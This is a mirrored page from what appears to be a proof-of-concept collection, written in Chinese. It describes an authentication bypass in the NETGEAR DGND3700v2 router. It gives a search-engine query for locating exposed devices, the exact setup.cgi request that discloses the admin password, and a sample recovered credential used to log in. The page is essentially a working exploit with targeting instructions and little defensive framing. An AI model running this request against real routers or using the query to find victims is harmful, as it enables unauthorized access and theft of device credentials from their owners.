admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 14:04:06 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/NETGEAR/NETGEARDGND3700v2路由器setup.cgi接口身份认证绕过漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

918 B
Raw Blame History

NETGEAR DGND3700v2 路由器 setup.cgi 接口身份认证绕过漏洞

一、漏洞简介

NETGEAR DGND3700v2 是一款高效的企业路由器NETGEAR DGND3700v2 存在身份认证绕过漏洞,攻击者可利用漏洞读取用户账号密码,访问敏感信息页面。

二、影响版本

  • NETGEAR DGND3700v2

三、资产测绘

  • hunterweb.title="DGND3700v2"

四、漏洞复现

/setup.cgi?next_file=passwordrecovered.htm&foo=currentsetting.htm

1702017292533-6337aabc-a1b3-455f-acee-a10ad3c20dfc.png

通过上述密码登录系统

admin/password

1702017321828-68b8d415-f1e3-459a-aec6-0ba1bbeedea3.png

更新: 2024-02-29 23:57:12
原文: https://www.yuque.com/xiaokp7/ocvun2/nfl28ku7srgz3zrl